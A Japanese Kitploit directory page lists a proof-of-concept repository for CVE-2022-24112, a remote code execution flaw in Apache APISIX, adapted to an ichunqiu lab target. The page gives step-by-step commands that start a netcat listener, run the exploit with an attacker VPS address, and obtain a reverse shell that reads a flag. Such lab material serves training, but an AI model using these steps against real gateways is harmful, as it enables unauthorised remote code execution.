Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-24112_POC — CVE-2022-24112_POC | Kitploit
ツール/GitHubGitHub/acczdy/cve-2022-24112_poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングAPIセキュリティ
GitHubacczdy/cve-2022-24112_poc

CVE-2022-24112_POC

CVE-2022-24112_POC

リポジトリを見る
513年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

POC

収集したPOC

CVE-2022-24112

春秋云境:CVE-2022-24112のターゲット環境を実現するために、2つのPOCを修正しました。M4xSecとtwseptianの両氏のPOCを少し変更し、春秋云境のターゲットに適応させました:


春秋云境:CVE-2022-24112:

Apache APISIXは、Apache Software Foundationが開発したクラウドネイティブなマイクロサービスAPIゲートウェイサービスです。このソフトウェアはOpenRestyとetcdをベースにしており、動的なルーティングとプラグインのホットリロードを備え、マイクロサービスアーキテクチャにおけるAPI管理に適しています。Apache APISIXには、リモートコード実行の脆弱性が存在します。この脆弱性は、製品のbatch-requestsプラグインがユーザーのバッチリクエストを適切に制限しなかったことに起因します。攻撃者はこの脆弱性を悪用してAdmin APIのIP制限を回避し、リモートコード実行につなげることができます。


元のPOC:

1、M4xSec:https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py

2、twseptian:https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

修正されたPOCは上記の2つで、それぞれLinuxとWindowsの使用環境向けです:


CVE-2022-24112_Linux_by_twseptian.py

  1. VPSでリスナーを起動:nc -lvvp 18888

  2. POCディレクトリに移動して実行:

    注意:ここで-tにデータを追加する際、http://やhttps://を記述する必要はなく、ドメイン名+ポートのみで十分です。例:

    root@kitploit:~
    python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
    
  3. VPSに戻って状況を確認すると次のようになります:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    

CVE-2022-24112_Windows_by_M4xSec.py

  1. VPSでリスナーを起動:nc -lvvp 18888

  2. POCディレクトリに移動して実行:

    注意:ここで-tにデータを追加する際、http://やhttps://を記述する必要はなく、ドメイン名+ポートのみで十分です。例:

    root@kitploit:~
    python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
    
  3. VPSに戻って状況を確認すると次のようになります:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    
ツールをダウンロード